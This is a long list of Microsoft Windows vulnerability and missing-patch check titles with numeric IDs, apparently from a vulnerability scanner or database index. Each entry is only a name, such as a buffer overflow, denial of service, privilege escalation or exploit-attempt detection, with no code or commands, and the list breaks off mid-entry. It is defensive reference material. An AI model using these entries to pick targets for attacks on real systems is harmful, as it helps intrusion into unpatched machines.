PNG IHDR block denial of service [28281] Microsoft Windows WMF gdi32.dll denial of service [28240] Microsoft Windows DNS client data string buffer overflow [28183] Microsoft Windows gdiplus.dll denial of service [28045] Microsoft Windows Knowledge Base Article 918899 update is not installed [28028] Microsoft Windows Knowledge Base Article 922616 update is not installed [28027] Microsoft Windows Knowledge Base Article 922968 update is not installed [28024] Microsoft Windows Knowledge Base Article 921645 update is not installed [28022] Microsoft Windows Knowledge Base Article 920670 update is not installed [28020] Microsoft Windows Hyperlink Object Library (hlink.dll) buffer overflow [28019] Microsoft Windows Knowledge Base Article 920214 update is not installed [28018] Microsoft Windows Knowledge Base Article 921398 update is not installed [28017] Microsoft Windows Knowledge Base Article 920958 update is not installed [28016] Microsoft Windows kernel system inputs buffer overflow [28015] Microsoft Windows Knowledge Base Article 920683 update is not installed [28014] Microsoft Windows Winsock API buffer overflow [28013] Microsoft Windows DNS client buffer overflow [28012] Microsoft Windows Knowledge Base Article 917422 update is not installed [28011] Microsoft Windows kernel exception handling code execution [28009] Microsoft Windows kernel Winlogon privilege escalation [28008] Microsoft Windows Knowledge Base Article 917008 update is not installed [28005] Microsoft Windows 2000 Management Console (MMC) resource file cross-site scripting [28004] Microsoft Windows Knowledge Base Article 921883 update is not installed [28002] Microsoft Windows Server service buffer overflow [27999] Microsoft Windows SMB malformed PIPE denial of service [27832] Microsoft Windows ASN.1 Library HTTP NTLM buffer overflow [27567] Microsoft Windows explorer.exe Internet Shortcut (.url) denial of service [27562] Microsoft Windows Knowledge Base Article 915384 update is not installed [27554] Microsoft Windows Knowledge Base Article 917284 update is not installed [27467] Microsoft Windows Knowledge Base Article 917285 update is not installed [27417] Microsoft Windows Live Messenger contact list denial of service [26905] Microsoft Windows Knowledge Base Article 918547 update is not installed [26903] Microsoft Windows Knowledge Base Article 917336 update is not installed [26886] Microsoft Windows Knowledge Base Article 917953 update is not installed [26884] Microsoft Windows Knowledge Base Article 917736 update is not installed [26883] Microsoft Windows Knowledge Base Article 917537 update is not installed [26882] Microsoft Windows Knowledge Base Article 917344 update is not installed [26880] Microsoft Windows Knowledge Base Article 917159 update is not installed [26876] Microsoft Windows Knowledge Base Article 916281 update is not installed [26874] Microsoft Windows Knowledge Base Article 914389 update is not installed [26871] Microsoft Windows Knowledge Base Article 914388 update is not installed [26868] Microsoft Windows Knowledge Base Article 917734 update is not installed [26867] Microsoft Windows Knowledge Base Article 911280 update is not installed [26865] Microsoft Windows Knowledge Base Article 917283 update is not installed [26861] Microsoft Windows Knowledge Base Article 918439 update is not installed [26836] Microsoft Windows RPC mutual authentication spoofing [26834] Microsoft Windows TCP/IP protocol driver buffer overflow [26830] Microsoft Windows SMB invalid handle denial of service [26823] Microsoft Windows DHCP Client buffer overflow [26820] Microsoft Windows SMB Server service information disclosure [26818] Microsoft Windows Mailslot Server driver buffer overflow [26815] Microsoft Windows Graphics Rendering Engine (GRE) WMF code execution [26814] Microsoft Windows RRAS RASMAN buffer overflow [26813] Microsoft Windows Knowledge Base Article 916768 update is not installed [26812] Microsoft Windows RRAS buffer overflow [26809] Microsoft Windows ART image rendering library buffer overflow [26805] Microsoft Windows JScript code execution [26788] Microsoft Windows Media Player PNG buffer overflow [26487] Microsoft Windows NTDLL.DLL improper DOS to NT path conversion [26166] Microsoft Windows Knowledge Base Article 912442 update is not installed [26161] Microsoft Windows Knowledge Base Article 916803 update is not installed [26156] Microsoft Windows Knowledge Base Article 913580 update is not installed [25794] Microsoft Windows Knowledge Base Article 917627 update is not installed [25792] Microsoft Windows Knowledge Base Article 911567 update is not installed [25629] Microsoft Windows Knowledge Base Article 912812 update is not installed [25626] Microsoft Windows Knowledge Base Article 911562 update is not installed [25625] Microsoft Windows Knowledge Base Article 908531 not installed [25598] Microsoft Windows XP Firewall .exe firewall bypass [25597] Microsoft Windows XP Firewall ADS filename:stream syntax application alert bypass [25573] Microsoft Windows winhlp32.exe .hlp embedded image buffer overflow [25554] Microsoft Windows Explorer COM object code execution [25535] Microsoft Outlook Express Windows Address Book file buffer overflow [25370] Microsoft Windows Knowledge Base Article 901190 not installed [25369] Microsoft Windows DNS recursive query denial of service [25366] Microsoft Windows Knowledge Base Article 905755 update is not installed [25365] Microsoft Windows Knowledge Base Article 914798 update is not installed [25364] Microsoft Windows Knowledge Base Article 914451 update is not installed [25363] Microsoft Windows Knowledge Base Article 905756 update is not installed [25361] Microsoft Windows Knowledge Base Article 905758 update is not installed [25360] Microsoft Windows Knowledge Base Article 905754 update is not installed [25359] Microsoft Windows Knowledge Base Article 905555 update is not installed [25358] Microsoft Windows Knowledge Base Article 905646 update is not installed [25357] Microsoft Windows Knowledge Base Article 905757 update is not installed [25342] Microsoft Windows Knowledge Base Article 905553 update is not installed [25261] Microsoft Windows Knowledge Base Article 913433 is not installed [24586] Microsoft Windows DNS client ATMA data record buffer overflow [24512] Microsoft Windows Knowledge Base Article 911565 update is not installed [24511] Microsoft Windows Knowledge Base Article 911564 update is not installed [24509] Microsoft Windows Knowledge Base Article 889167 update is not installed [24496] Microsoft Windows Knowledge Base Article 911927 update is not installed [24495] Microsoft Windows Knowledge Base Article 913446 update is not installed [24494] Microsoft Windows Knowledge Base Article 910620 update is not installed [24493] Microsoft Windows Media Player Plugin EMBED element buffer overflow [24492] Microsoft Windows and Office Korean IME privilege elevation [24491] Microsoft Windows MSRPC WebClient service message buffer overflow [24489] Microsoft Windows IGMP v3 denial of service [24488] Microsoft Windows Media Player BMP image parsing service buffer overflow [24474] Microsoft Windows 2000 LDAP client accepts untrusted CA [24473] Microsoft Windows 2000 event ID 565 not logged [24472] Microsoft Windows 2000 Event ID 1704 records incorrect group policy settings [24471] Microsoft Windows VDM information disclosure [24463] Microsoft Windows XP &quot [24407] Microsoft Windows 2000 SECEDIT command fails to set ACLs correctly [24405] Microsoft Windows 2000 UPN credentials with trailing dot group policy bypass [24403] Microsoft Windows 2000 WideCharToMultiByte() incorrect Japanese character conversion [24402] Microsoft Windows 2000 Terminal Service client IP not logged [24400] Microsoft Windows 2000 domain authentication can be bypassed by a local administrator [24157] Microsoft Windows wireless ad-hoc network unauthorized access [24044] Microsoft Windows GRE ExtCreateRegion() and ExtEscape() WMF denial of service [23978] Microsoft Windows Knowledge Base Article 912919 update is not installed [23926] Microsoft Windows Knowledge Base Article 908523 update is not installed [23924] Microsoft Windows Knowledge Base Article 908519 update is not installed [23922] Microsoft Windows embedded Open Type Web font buffer overflow [23846] Microsoft Windows GDI32.DLL WMF image rendering code execution [23453] Microsoft Windows COM object as ActiveX control allows execution of code [23450] Microsoft Windows Knowledge Base Article 905915 update is not installed [23447] Microsoft Windows APC queue list could allow elevated privileges [23284] Microsoft Windows SynAttackProtect denial of service [23066] Microsoft Windows XP and 2000 Server MSRPC memory allocation denial of service [22899] Microsoft Windows Knowledge Base Article 902412 update is not installed [22882] Microsoft Windows Knowledge Base Article 896424 update is not installed [22877] Microsoft Windows Metafile image format buffer overflow [22876] Microsoft Windows Metafile and Enhance Metafile buffer overflow [22524] Microsoft Windows XP Wireless Zero Configuration service information disclosure [22514] Microsoft Windows Knowledge Base Article 902400 update is not installed [22512] Microsoft Windows Knowledge Base Article 907245 update is not installed [22502] Microsoft Windows Knowledge Base Article 905749 update is not installed [22501] Microsoft Windows Knowledge Base Article 900725 update is not installed [22498] Microsoft Windows XP tftp.exe heap overflow [22495] Microsoft Windows Collaboration Data Objects buffer overflow [22492] Microsoft Windows Knowledge Base Article 904706 update is not installed [22481] Microsoft Windows MSRPC Plug and Play buffer overflow [22480] Microsoft Windows DirectShow .AVI file code execution [22479] Microsoft Windows HTML in preview fields execute code [22478] Microsoft Windows .lnk properties execute code [22477] Microsoft Windows .lnk file execute code [22476] Microsoft Windows Distributed Transaction Coordinator message denial of service [22475] Microsoft Windows Distributed Transaction Coordinator TIP denial of service [22473] Microsoft Windows COM code execution [22204] Microsoft Windows keybd_event or SendKeys allows elevated privileges [22156] Microsoft Windows Knowledge Base Article 899589 update is not installed [22089] Microsoft Windows Registry Editor Utility concealment [21980] Microsoft Windows Registry Editor Utility concealment [21978] Microsoft Windows user32.dll component denial of service [21954] Microsoft Windows Remote Desktop Protocol mstlsapi.dll Man-in-the-Middle [21931] Microsoft Windows XP memory leak [21895] Microsoft Windows Msdds.dll object command execution [21704] Microsoft Windows Knowledge Base Article 896727 update is not installed [21700] Microsoft Windows Client Service for NetWare code execution [21626] Microsoft Windows PKINIT protocol obtain information [21605] Microsoft Windows Knowledge Base Article 896423 update is not installed [21604] Microsoft Windows print spooler buffer overflow [21603] Microsoft Windows Knowledge Base Article 899588 update is not installed [21602] Microsoft Windows Plug and Play buffer overflow [21601] Microsoft Windows Knowledge Base Article 899591 update is not installed [21600] Microsoft Windows Knowledge Base Article 893756 update is not installed [21599] Microsoft Windows telephony service buffer overflow [21539] Microsoft Windows USB device driver buffer overflow [21407] Microsoft Windows RDP request denial of service [21355] Microsoft Windows Network Connection Manager denial of service [21345] Microsoft Windows 2000 Update Rollup 1 for Service Pack 4 has not been installed [21272] Microsoft Windows Knowledge Base Article 903672 update is not installed [21269] Microsoft Windows Knowledge Base Article 901214 update is not installed [21221] Microsoft Windows Color Management Module buffer overflow [21214] Microsoft Windows NTFS allows attacker to obtain information [20829] Microsoft Windows Step-by-Step Interactive Training bookmark link file buffer overflow [20826] Microsoft Windows Knowledge Base Article 896422 update is not installed [20825] Microsoft Windows Knowledge Base Article 896358 update is not installed [20823] Microsoft Windows Knowledge Base Article 890169 update is not installed [20822] Microsoft Windows Knowledge Base Article 883939 update is not installed [20821] Microsoft Windows compiled Help (.CHM) integer overflow [20820] Microsoft Windows Knowledge Base Article 896426 update is not installed [20818] Microsoft Windows WebClient Service buffer overflow [20815] Microsoft Windows SMB process gain access [20629] Multiple Microsoft Windows IPv6 LAND denial of service [20546] Microsoft Windows Media Player allows creation of malicious media files [20382] Microsoft Windows Knowledge Base Article 894320 update is not installed [20380] Microsoft Windows Web View command execution [20318] Microsoft Windows Knowledge Base Article 893086 update is not installed [20317] Microsoft Windows Knowledge Base Article 890923 update is not installed [20000] Microsoft Windows Knowledge Base Article 892944 update is not installed [19969] Multiple Microsoft Windows Server 2003 Edition printer driver denial of service [19965] Multiple Microsoft Windows Server 2003 Editions SMB redirector denial of service [19843] Microsoft Windows Knowledge Base Article 894549 update is not installed [19836] Microsoft Windows CSRSS gain control [19835] Microsoft Windows HTML Application Host command execution [19834] Microsoft Windows object buffer overflow [19832] Microsoft Windows access requests gain privileges [19830] Microsoft Windows font buffer overflow [19829] Microsoft Windows Message Queuing component buffer overflow [19819] Microsoft Windows Remote Desktop &quot [19727] Microsoft Windows 2000 GDI32.DLL denial of service [19593] Microsoft Windows LAND denial of service [19288] IBM DB2 running on Microsoft Windows obtain information [19270] Microsoft Windows PNG image buffer overflow [19220] Microsoft Windows registry key connection denial of service [19110] Microsoft Windows Hyperlink Object Library code execution [19109] Microsoft Windows OLE code execution [19105] Microsoft Windows COM files gain privileges [19103] Multiple Microsoft Windows TCP/IP denial of service [19101] Microsoft Windows Servers License Logging service code execution [19096] Microsoft Windows Media Player PNG buffer overflow [19093] Microsoft Windows named pipe information disclosure [19091] Microsoft Windows SharePoint Services and SharePoint Team Services cross-site scripting [19089] Microsoft Windows SMB code execution [18879] Microsoft Windows USER32.DLL ANI header overflow [18768] Microsoft Windows Knowledge Base Article 891711 update is not installed [18766] Microsoft Windows Knowledge Base Article 871250 update is not installed [18758] Microsoft Windows Indexing Service allows code execution [18678] Microsoft Windows winhlp32.exe buffer overflow [18668] Microsoft Windows LoadImage API buffer overflow [18667] Microsoft Windows ANI file zero rate number overflow denial of service [18587] Microsoft Windows Media Player ActiveX object reveals existence of files [18576] Microsoft Windows Media Player mp3 code execution [18507] Microsoft Windows XP SP2 subnet option allows access to firewall exceptions [18394] Microsoft Windows Knowledge Base Article 870763 update is not installed [18393] Microsoft Windows Knowledge Base Article 873339 update is not installed [18392] Microsoft Windows Knowledge Base Article 885249 update is not installed [18391] Microsoft Windows Knowledge Base Article 885835 update is not installed [18390] Microsoft Windows Knowledge Base Article 885836 update is not installed [18378] Microsoft Windows Icon image anomaly detected [18342] Microsoft Windows NT DHCP HardwareAddress code execution [18341] Microsoft Windows NT DHCP MachineName denial of service [18340] Microsoft Windows LSASS gain privileges [18339] Microsoft Windows kernel LPC interface gain privileges [18338] Microsoft Windows Word for Windows 6.0 Converter font code execution [18337] Microsoft Windows Word for Windows 6.0 Converter table code execution [18336] Microsoft Windows HyperTerminal session file buffer overflow [18314] Microsoft Windows Knowledge Base Article 889293 update is not installed [18208] Microsoft Windows logon screen saver allows elevated privileges [17864] Microsoft Windows XP Explorer WAV file denial of service [17711] Microsoft Windows XP SP2 sessmgr.exe firewall bypass [17663] Microsoft Windows MS04-029 patch is not installed [17662] Microsoft Windows MS04-037 patch is not installed [17661] Microsoft Windows MS04-036 patch is not installed [17660] Microsoft Windows MS04-035 patch is not installed [17659] Microsoft Windows MS04-034 patch is not installed [17658] Microsoft Windows MS04-032 patch is not installed [17657] Microsoft Windows NetDDE MS04-031 patch is not installed [17646] Microsoft Windows RPC Runtime Library obtain information [17641] Microsoft Windows NNTP buffer overflow [17624] Microsoft Windows XP and Windows Server 2003 Compressed Folders buffer overflow [17621] Microsoft Windows 2003 SMTP service code execution [17560] Microsoft Windows 2000 and XP GDI library denial of service [17521] Microsoft Windows 2000 Service Pack 4 is not installed [17458] Microsoft Windows CE KDataStruct information disclosure [17457] Microsoft Windows XP Explorer.exe TIFF denial of service [17455] Microsoft Windows XP information disclosure [17412] IBM with Microsoft Windows XP Professional has default administrator account [17341] Microsoft Windows MS04-028 patch is not installed [17052] Microsoft Windows XP and Internet Explorer displays improper file icon [17051] Microsoft Windows XP Content-Location bypass Local Computer zone restrictions [17023] Microsoft Windows XP Windows Explorer bypass Zone Identifier (ZoneID) feature [17009] Microsoft Windows XP ICF bypass filter [17004] Microsoft Windows XP Service Pack 2 is not installed on the system [16913] Microsoft Windows 2003 users with Synchronize directory service data privilege [16912] Microsoft Windows 2003 groups with Synchronize directory service data privilege [16909] Microsoft Windows 2003 groups with Remove computer from docking station privilege [16907] Microsoft Windows 2003 users with Create global objects privilege [16905] Microsoft Windows 2003 users or groups with Create global objects privilege [16851] Microsoft Windows 2003 and XP WinKey and U key denial of service [16704] Microsoft Windows 2000 Media Player control code execution [16664] Microsoft Windows Program Group Converter buffer overflow [16627] Microsoft Windows System32 write file to the directory has been detected [16597] Microsoft Windows Windows Shell allows code execution [16592] Microsoft Windows Utility Manager gain privileges [16591] Microsoft Windows Task Scheduler buffer overflow [16590] Microsoft Windows POSIX buffer overflow allows local attacker to gain privileges [16587] Microsoft Windows Network Dynamic Data Exchange Running [16586] Microsoft Windows HTML Help could allow execution of code [16582] Microsoft Windows Server 2003 kernel CPU denial of service [16581] Microsoft Windows Enhanced Metafile (EMF) buffer overflow [16580] Microsoft Windows Virtual DOS Machine (VDM) allows elevated privileges [16579] Microsoft Windows Window Management API allows elevated privileges [16572] Microsoft Windows 2003 Users with Impersonate a client after authentication privilege [16570] Microsoft Windows 2003 Users with Create global objects privilege [16564] Microsoft Windows 2003 Groups with Create global objects privilege [16562] Microsoft Windows 2003 Groups with &quot [16556] Microsoft Windows NetDDE buffer overflow [16522] Microsoft Windows 2003 Impersonate a client after authentication privilege [16521] Microsoft Windows 2003 Deny Logon Through Terminal Services privilege [16520] Microsoft Windows 2003 Create global objects privilege [16362] Microsoft Windows XP Help Center and Support starts automatically [16304] Microsoft Windows JPEG buffer overflow [16276] Microsoft Windows 2000 Advanced Server fully qualified domain name security bypass [16270] Microsoft Windows IPSec filter bypass [16213] Microsoft Windows Local Security Authority buffer overflow exploit attempt detected [16211] Microsoft Windows Service Host buffer overflow exploit attempt detected [16210] Microsoft Windows Service Host buffer overflow exploit attempt detected [16208] Microsoft Windows RPC Locator Service buffer overflow exploit attempt detected [16207] Microsoft Windows kernel buffer overflow exploit attempt detected [16206] Microsoft Windows Command Shell buffer overflow exploit attempt detected [16171] Microsoft Windows XP Explorer code execution [16154] Microsoft Windows NT 4.0 TSE Security Patch denial of service [16095] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15956] Microsoft Windows long file share name buffer overflow [15818] Microsoft Windows MS04-011 patch is not installed [15813] Microsoft Windows MS04-014 patch is not installed [15811] Microsoft Windows MS04-012 patch is not installed [15715] Microsoft Windows Negotiate Security Software Provider buffer overflow [15714] Microsoft Windows Virtual DOS Machine allows elevated privileges [15713] Microsoft Windows ASN.1 double-free [15711] Microsoft Windows object identifier could be used to open network ports [15710] Microsoft Windows H.323 buffer overflow [15709] Microsoft Windows COM Internet Service and RPC over HTTP denial of service [15708] Microsoft Windows RPCSS Service RPC message can cause denial of service [15707] Microsoft Windows Local Descriptor Table allows privilege escalation [15704] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15702] Microsoft Windows winlogon buffer overflow [15700] Microsoft Windows 2000 Domain Controller LSASS LDAP message denial of service [15699] Microsoft Windows LSASS buffer overflow [15678] Microsoft Windows XP task creation allows privilege escalation [15632] Microsoft Windows 2000 Utility Manger allows privilege escalation [15589] Microsoft Windows allows elevated privileges [15507] Microsoft Windows XP Explorer wmf denial of service [15461] Microsoft Windows MS04-008 patch is not installed [15394] Microsoft Windows service running under non-built-in accounts has been detected [15284] Microsoft Windows XP Windows shell shimgvw.dll buffer overflow [15263] Microsoft Windows XP and 2000 Server kernel allows elevated privileges [15256] Microsoft Windows ASN.1 buffer overflow packet using NTLM has been detected [15255] Microsoft Windows ASN.1 buffer overflow packet using SMTP has been detected [15223] Microsoft Windows access violation or exception code has been detected [15218] Microsoft Windows command shell backdoor [15101] Microsoft Windows XP helpctr.exe cross-site scripting [15057] Microsoft Windows XP and Windows Server 2003 smbmount Linux client denial of service [15039] Microsoft Windows ASN.1 Library buffer overflow [15038] Microsoft Windows 2000 Server Windows Media Services denial of service [15037] Microsoft Windows Server 2003 WINS /GS flag denial of service [14924] Microsoft Windows XP folder containing HTML code and executable file code execution [13786] Microsoft Windows MS03-051 patch is not installed [13785] Microsoft Windows MS03-048 patch is not installed [13784] Microsoft Windows MS03-050 patch is not installed [13639] Microsoft Windows Workstation buffer overflow [13638] Microsoft Windows MS03-049 patch is not installed [13558] Microsoft Windows XP CommCtl32.dll could allow an attacker to execute code [13509] Microsoft Windows HTML Help could allow an attacker to gain privileges [13482] Microsoft Windows MS03-047 patch is not installed [13480] Microsoft Windows MS03-046 patch is not installed [13478] Microsoft Windows MS03-044 patch is not installed [13473] Microsoft Windows MS03-045 patch is not installed [13472] Microsoft Windows MS03-042 patch is not installed [13471] Microsoft Windows MS03-041 patch is not installed [13444] Microsoft Windows Non-English patched with MS03-045 denial of service in Sophos Anti-Virus [13426] Microsoft Windows 2000 and XP RPC race condition [13424] Microsoft Windows User32.dll ListBox and ComboBox controls buffer overflow [13423] Microsoft Windows 2000 Local Troubleshooter ActiveX control buffer overflow [13422] Microsoft Windows Authenticode could allow an attacker to execute code [13420] Microsoft Windows HSC HCP protocol file buffer overflow [13413] Microsoft Windows Messenger Service popup buffer overflow [13412] Microsoft Windows MS03-043 patch is not installed [13407] Microsoft Windows 2000 Server mqsvc.exe MQLocateBegin packet buffer overflow [13385] Microsoft Windows Server 2003 &quot [13375] Microsoft Windows Media Player Dynamic HTML behaviors allows an attacker to execute code [13364] Microsoft Windows MS03-040 patch is not installed [13344] Microsoft Windows 98 flood of fragmented UDP packets causes denial of service [13342] Microsoft Windows PostThreadMessage API allows processes to be terminated without permission [13211] Microsoft Windows 2000 and XP URG memory leak [13183] Microsoft Windows service pack detected [13171] Microsoft Windows Server 2003 can allow attacker to bypass mechanism used to detect buffer overflows [13134] Microsoft Windows MS03-039 patch is not installed [13131] Microsoft Windows 2000 Message Queue Manager buffer overflow [13129] Microsoft Windows RPCSS DCOM buffer overflows [13105] Microsoft Windows Update fails to notify users of updates when host-blocking is used [13095] Microsoft Windows auto update is disabled [13089] Microsoft Windows NetBIOS Name Service information disclosure [12903] Microsoft Windows command shell banner [12835] Microsoft Windows Pocket PC could allow an attacker to gain access [12762] Microsoft Windows NT 4.0 Q823803i patch RRAS denial of service [12747] Microsoft Windows RPC DCOM interface buffer overflow detected [12724] Microsoft Windows Media Player ASF file could allow code execution [12701] Microsoft Windows NT 4.0 Server file management function denial of service [12679] Microsoft Windows RPC DCOM denial of service [12652] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension POST request buffer overflow [12620] Microsoft Windows 2000 Server SMTP FILETIME denial of service [12544] Microsoft Windows Servers SMB packet buffer overflow [12543] Microsoft Windows 2000 Accessibility Utility Manager could allow an attacker to gain privileges [12533] Microsoft Windows MS03-010 patch is not installed [12521] Microsoft Windows Rundll32.exe overly long routine name buffer overflow [12493] Microsoft Windows Shell32.dll 2000 ShellExecute function buffer overflow [12489] Microsoft Windows 2000 Server Active Directory buffer overflow [12442] Microsoft Windows XP SP1 Windows shell desktop.ini buffer overflow [12440] Microsoft Windows Media Player ActiveX control could disclose sensitive information [12187] Microsoft Windows XP gethostbyaddr() denial of service [12128] Microsoft Windows 2000 and Windows NT MS03-019 patch is not installed [12092] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension buffer overflow [12048] Microsoft Windows 2000 and Windows Server 2003 LAN Manager hash creation enabled [11953] Microsoft Windows Media Player skin downloading could allow an attacker to execute code [11824] Microsoft Windows XP Service Control Manager (SCM) race condition [11822] Microsoft Windows regedit.exe command execution [11816] Microsoft Windows 2000 Terminal Services MSGINA.DLL insecure access permissions [11810] Microsoft Windows win2k.sys EngTextOut denial of service [11803] Microsoft Windows kernel LpcRequestWaitReplyPort() buffer overflow [11696] Microsoft Windows 2000 Terminal Services man-in-the-middle attack [11617] Microsoft Windows 2000 MS03-007 patch is not installed on the system [11575] Microsoft Windows Script Engine buffer overflow [11546] Microsoft Windows 2000 Windows Help Facility .cnt file buffer overflow [11536] Microsoft Windows PostMessage() API function could disclose password [11505] Microsoft Windows XP Safe Mode bypass [11425] Microsoft Windows Me HSC hcp:// buffer overflow [11344] Microsoft Windows riched20.dll attribute label buffer overflow [11329] Microsoft Windows NT and 2000 cmd.exe CD path name buffer overflow [11274] Microsoft Windows 2000 NetBIOS continuation packets denial of service [11273] Microsoft Windows 2000 RPC service could allow an attacker to gain elevated privileges [11260] Microsoft Windows XP Windows Redirector buffer overflow [11216] Microsoft Windows NT and 2000 command prompt denial of service [11141] Microsoft Windows 2000 Terminal Services MSGINA.DLL denial of service [11132] Microsoft Windows Locator service buffer overflow [11030] Microsoft Windows OpenType font (.otf) fontview denial of service [10958] Microsoft Windows File Protection certificate chains with a trusted root CA are accepted [10957] Microsoft Windows File Protection fails to remove old security catalog .CAT files [10892] Microsoft Windows XP Shell media file buffer overflow [10843] Microsoft Windows 2000 and XP SMB signing group policy modification [10764] Microsoft Windows XP wireless LAN feature could leak information [10736] Microsoft Windows XP Fast User Switching could disclose user processes [10431] Microsoft Windows 2000 SNMP LANMAN Extension memory leak denial of service [10400] Microsoft Windows 2000 RPC TCP port 135 denial of service [10398] Microsoft Windows Media Player world-writable executables [10377] Microsoft Windows XP and 2000 administrative alerts fail when security event log is full [10343] Microsoft Windows NetDDE Agent can be used to gain elevated privileges [10279] Microsoft Windows XP &quot [10254] Microsoft Windows compiled HTML Help (.chm) files could be used to execute code [10253] Microsoft Windows HTML Help ActiveX buffer overflow [10252] Microsoft Windows zipped file decompression incorrect target path [10251] Microsoft Windows zipped file decompression buffer overflow [10215] Microsoft Windows Scripting Host is running on the system [10199] Microsoft Windows 2000/XP PPTP packet buffer overflow [10132] Microsoft Windows fails to properly check execute permissions for 16-bit executable files [10122] Microsoft Windows Remote Desktop Protocol could allow an attacker to monitor keystrokes [10121] Microsoft Windows Remote Desktop Protocol checksum information leak [10120] Microsoft Windows XP Remote Desktop malformed PDU Confirm Active packet denial of service [9982] Microsoft Windows Certificate Enrollment Control ActiveX control could be used to delete digital certificates [9971] Microsoft Windows Media Player .wmf file extension or content type spoofing [9953] Microsoft Windows Media Player WMD code execution [9946] Microsoft Windows 2000 Terminal Services session screensaver fails to lock the console [9933] Microsoft Windows NT/2000/XP SMB packet request buffer overflow [9878] Microsoft Windows XP Help and Support Center HCP:// URL could be used to delete files [9869] Microsoft Windows NTFS hard links could bypass event auditing logs [9856] Microsoft Windows 2000 NCM handler routine could allow elevated privileges [9779] Microsoft Windows 2000 weak system partition permissions [9752] Microsoft Windows 2000 Service Pack 3 is not installed [9746] Microsoft Windows 2000 HTML Help item parameter buffer overflow [9727] Microsoft Windows Media Player mplay32 long file name buffer overflow [9625] Microsoft Windows 2000 Narrator allows login information to be audible [9422] Microsoft Windows Media Player Active Playlist could allow local HTML script execution [9421] Microsoft Windows Media Player WMDM service invalid resource connection could allow elevated privileges [9420] Microsoft Windows Media Player cache path disclosure could allow remote execution of code [8918] Microsoft Windows XP Remote Desktop Access is enabled [8915] Microsoft Windows XP Internet Configuration Firewall is disabled [8892] Microsoft Windows XP &quot [8891] Microsoft Windows XP option to digitally sign server communications disabled [8890] Microsoft Windows XP option to digitally sign client communications when server agrees disabled [8889] Microsoft Windows XP option to digitally sign server communications when client agrees disabled [8888] Microsoft Windows XP security option to digitally sign client communications disabled [8882] Microsoft Windows XP Session security for NTLM SSP based servers is below minimum [8880] Microsoft Windows XP Session security for NTLM SSP based clients is below minimum [8867] Microsoft Windows 2000 LanMan denial of service [8813] Microsoft Windows 2000 Terminal Services allows attacker to bypass group policy settings [8759] Microsoft Windows 2000 could allow an attacker to block the application of Group Policy settings [8752] Microsoft Windows NT, 2000, and XP MUP buffer overflow [8739] Microsoft Windows 2000 DCOM memory leak [8728] Microsoft Windows Registry remote write audit [8727] Microsoft Windows Registry remote access audit [8621] Microsoft Internet Explorer on Windows Me fails to prompt user when a cookie is stored if set using JavaScript [8604] Microsoft Outlook allows an attacker to execute JavaScript code by using IFRAME tags to reference malicious Windows Media Player file [8559] Microsoft Windows registry security SAM read [8512] Microsoft Windows NT security ID lookup [8509] Microsoft Windows startup folder access [8462] Microsoft Windows NT/2000 debugging subsystem allows attacker to create duplicate handles [8402] Microsoft Windows 2000 allows an attacker to bypass password policy [8388] Microsoft Windows NT Server with IIS 4.0 could allow users to bypass &quot [8384] Microsoft Windows Shell buffer overflow can occur when an application has been improperly removed [8307] Microsoft Windows 2000, Windows XP, and Exchange 2000 SMTP data transfer command denial of service [8304] Microsoft Windows 2000 and Exchange 5.5 SMTP service unauthorized mail privileges [8231] Microsoft Windows NT SNMP OID decoding memory leak [8209] Microsoft Windows XP CIFS port denial of service [8207] Microsoft Windows XP UDP port denial of service [8199] Microsoft Windows 2000 Terminal Services unlocked client [8094] Microsoft Windows 2000 and Interix 2.2 Telnet protocol option buffer overflow [8077] Microsoft Windows Messenger and/or MSN Messenger is present on the system [8043] Microsoft Windows NT, 2000, and XP using NTFS could allow files to be hidden [8037] Microsoft Windows 2000 empty TCP packet denial of service [8023] Microsoft Windows NT and Windows 2000 SIDs could allow an attacker to gain elevated privileges in another domain [8000] Microsoft Windows XP &quot [7922] Microsoft Windows XP Pro Upgrade installation causes security patches for Internet Explorer to be rolled back [7892] Microsoft Windows 95 Backup long file extension buffer overflow [7800] Microsoft Internet Explorer Windows Media Player ActiveX could allow an attacker to determine the existence of files or directories [7732] Microsoft Windows XP Remote Desktop sends username in plain text [7731] Microsoft Windows XP fast user switching could lockout users except administrator [7722] Microsoft Windows XP, Me, 98, and 98SE UPnP spoofed UDP packet with SSDP announcement denial of service attack [7721] Microsoft Windows XP, Me, 98, and 98SE UPnP malformed NOTIFY directive buffer overflow [7713] Microsoft Windows XP allows attacker to execute programs using hotkeys without authentication [7709] Microsoft Windows multiple vendor Web browser high image count denial of service [7667] Microsoft Windows 2000 IKE UDP packet flood denial of service [7605] Microsoft Windows XP helpctr.exe buffer overflow [7542] Microsoft Windows 95 and 98 with multiple TCP/IP stacks ICMP packet denial of service [7538] Microsoft Windows 2000 and XP Terminal services allow an attacker to spoof IP addresses [7533] Microsoft Windows 2000 RunAs service denial of service [7532] Microsoft Windows 2000 RunAs service allows local attacker to bypass pipe authentication [7531] Microsoft Windows 2000 RunAs service reveals sensitive information [7528] Microsoft Windows NT and Windows 2000 malformed RPC request denial of service [7428] Microsoft Windows Me and XP UPnP denial of service [7422] Microsoft Windows NT RSHSVC does not properly validate users [7421] Microsoft Windows NT GetThreadContext/SetThreadContext denial of service [7409] Microsoft Windows 2000 and Windows XP GDI denial of service [7405] Microsoft Windows NT NonPagedPool denial of service [7403] Microsoft Windows NT Win32k.sys denial of service [7402] Microsoft Windows NT kernel mode handle-closing denial of service [7401] Microsoft Windows NT group policies not applied if long DC name [7400] Microsoft Windows NT user policies not updated [7398] Microsoft Windows NT symbolic link case elevation of privileges [7391] Microsoft Windows NT strong passwords may allow parts of the full name [7369] Microsoft Windows CSRSS.EXE denial of service [7329] Microsoft Windows NT WINS malformed packet flood denial of service [7318] Microsoft Windows ME SSDP service denial of service [7302] Microsoft Windows NT and 2000 Terminal Server malformed RDP packet series denial of service [7231] Microsoft Windows 95 using NetWare remote administration contains hidden share [7224] Microsoft Windows NT smbmount request from Linux client denial of service [7125] Microsoft Windows NT Index Server &quot [7107] Microsoft Windows NT Xenroll denial of service [7105] Microsoft Windows RPC endpoint mapper malformed request denial of service [7008] Microsoft Windows 2000 IrDA device denial of service [6977] Microsoft Windows NT and 2000 NNTP memory leak denial of service [6962] Microsoft Windows Media Player .ASF marker buffer overflow [6943] Microsoft Windows NT NT4ALL denial of service [6931] Microsoft Windows 2000 without Service Pack 2 [6924] Microsoft Windows 98 ARP packet flooding denial of service [6919] Microsoft Windows 2000 Task Manager does not terminate malicious 